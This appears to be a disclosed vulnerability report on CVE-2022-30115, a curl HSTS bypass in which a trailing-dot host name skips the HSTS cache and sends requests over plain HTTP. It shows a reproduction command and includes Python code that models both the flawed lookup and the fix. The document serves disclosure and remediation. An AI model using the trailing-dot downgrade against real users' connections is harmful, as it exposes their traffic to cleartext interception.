CVE-2022-30115: HSTS bypass via trailing dot
Medium
Vulnerability Details
curl can be given an HSTS cache file (`--hsts`). For any host listed in that cache, curl rewrites an http:// URL for that host to https:// before connecting, so the request is never sent in cleartext.
The lookup compares the host name from the URL against the cached entry as written. A host name given with a trailing dot (the absolute DNS form, e.g. `accounts.google.com.`) resolves to the same server but does not match the cached `accounts.google.com`, so the HSTS check is bypassed and the request goes out over plain HTTP.
If a user has a preloaded hsts.txt:
```
# Your HSTS cache. https://curl.se/docs/hsts.html
# This file was generated by libcurl! Edit at your own risk.
accounts.google.com "20230503 08:47:52"
```
Running the following, with the host name written with a trailing dot:
```
curl --hsts hsts.txt http://accounts.google.com.
```
causes the request to be sent to accounts.google.com over plain HTTP instead of being upgraded to HTTPS. The response (a 301 from the server, pointing at an http:// URL) confirms that no upgrade took place:
```
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://accounts.google.com/">here</A>.
</BODY></HTML>
```
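The lookup failure described above, as an added example (not curl's own code): a small model of the hsts.txt cache with the pre-fix comparison beside a normalised one that strips a single trailing dot before matching. The cache contents are a constructed copy of the file from this report plus one includeSubDomains entry; the convention that a leading dot means includeSubDomains is assumed from curl's documented file format, and the fixed clock `NOW` is an assumption so the example runs offline.

```python
"""HSTS cache lookup: the trailing-dot miss and a normalised lookup.

Added example, not curl's implementation. Models the hsts.txt layout shown
in the report; leading-dot = includeSubDomains is assumed from curl's
documented format (https://curl.se/docs/hsts.html).
"""
from datetime import datetime, timezone
from urllib.parse import urlsplit, urlunsplit

# Constructed cache: the entry from the report plus one includeSubDomains
# entry (leading dot) added purely for illustration.
HSTS_FILE = """\
# Your HSTS cache. https://curl.se/docs/hsts.html
# This file was generated by libcurl! Edit at your own risk.
accounts.google.com "20230503 08:47:52"
.example.com "20230503 08:47:52"
"""

# Assumed fixed clock so expiry handling is deterministic and offline.
NOW = datetime(2022, 5, 11, tzinfo=timezone.utc)


def parse_hsts(text):
    """Return [(host, include_subdomains, expiry)] from the hsts.txt layout."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        host, _, stamp = line.partition(" ")
        expiry = datetime.strptime(stamp.strip().strip('"'), "%Y%m%d %H:%M:%S")
        expiry = expiry.replace(tzinfo=timezone.utc)
        entries.append((host.lstrip(".").lower(), host.startswith("."), expiry))
    return entries


ENTRIES = parse_hsts(HSTS_FILE)


def _lookup(entries, host, now):
    """Exact or subdomain match against entries that have not expired."""
    for name, include_subs, expiry in entries:
        if expiry <= now:
            continue  # stale entry: no upgrade
        if host == name or (include_subs and host.endswith("." + name)):
            return True
    return False


def hsts_match_naive(entries, host, now):
    """Pre-fix behaviour: compare the host exactly as written in the URL.
    'accounts.google.com.' != 'accounts.google.com', so the lookup misses."""
    return _lookup(entries, host.lower(), now)


def hsts_match_fixed(entries, host, now):
    """Strip one trailing dot (absolute DNS name) before comparing."""
    host = host.lower()
    if host.endswith("."):
        host = host[:-1]
    return _lookup(entries, host, now)


def upgrade_url(url, entries, matcher, now=NOW):
    """Rewrite http:// to https:// when the URL host has a live HSTS entry."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.hostname:
        return url
    if matcher(entries, parts.hostname, now):
        return urlunsplit(("https",) + tuple(parts[1:]))
    return url


if __name__ == "__main__":
    for url in ("http://accounts.google.com",
                "http://accounts.google.com.",
                "http://www.example.com."):
        print(f"{url:30} naive -> {upgrade_url(url, ENTRIES, hsts_match_naive)}")
        print(f"{'':30} fixed -> {upgrade_url(url, ENTRIES, hsts_match_fixed)}")
```

The fix is a one-line normalisation, but note that it has to happen on the lookup side (and, for consistency, when entries are stored), not by rejecting dotted host names: the trailing-dot form is legal and is what the connection actually uses. The same check must also cover includeSubDomains entries, since a dotted `www.example.com.` fails the suffix comparison in exactly the same way.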
The same class of issue has been reported against other HTTP clients before, for example https://bugs.chromium.org/p/chromium/issues/detail?id=461481 and https://www.mozilla.org/en-US/security/advisories/mfsa2015-13/
## Impact
HSTS bypass
Report Stats
- Report ID: 1557449
- State: Closed
- Substate: resolved
- Upvotes: 5